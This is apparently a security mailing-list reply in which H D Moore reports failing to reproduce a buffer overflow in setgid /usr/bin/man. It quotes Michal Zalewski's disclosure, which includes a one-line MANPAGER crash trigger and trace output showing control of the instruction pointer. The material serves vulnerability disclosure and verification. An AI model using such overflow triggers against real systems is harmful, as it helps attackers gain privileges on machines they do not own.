Re: man bugs might lead to root compromise (RH 6.1 and other boxes)

[hdm () SECUREAUSTIN COM (H D Moore)]

Hi,

I could not reproduce this on a SuSE 6.2 system running:

man, version 2.3.10, db 2.3.1, July 12th, 1995
(G.Wilford () ee surrey ac uk)

My copy is setgid man and I also subjected it to 4,8, and 20 kb buffers
in every envrionment variable it uses without it flinching.

Michal Zalewski wrote:
> With most of Linux distributions, /usr/bin/man is shipped as setgid man.
> This setgid bit is required to build formatted manpages in /var/catman for
> faster access. Unfortunately, man does almost everything via system()
> calls, where parameters are user-dependent, and almost always it's
> sprintf'ed before to fixed size buffers. It's kinda trivial to gain man
> privledges, using buffer overflows in enviromental variables. For example,
> by specyfing MANPAGER variable with approx 4k 'A' letters, you'll get
> SEGV:
>
> $ MANPAGER=`perl -e '{print "A"x4000}'` man ls
>
> [...]
>
> 1200  setuid(500)                       = 0
> 1200  setgid(15)                        = 0
> 1200  open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
> 1200  open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200  
> open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
> 1200  open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200  close(-1)   
>                       = -1 EBADF (Bad file descriptor)
> 1200  write(2, "Error executing formatting or display command.\nSystem command (cd /usr/man ; (echo
> 1200  --- SIGSEGV (Naruszenie ochrony pamiêci) ---
> 1200  +++ killed by SIGSEGV +++
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()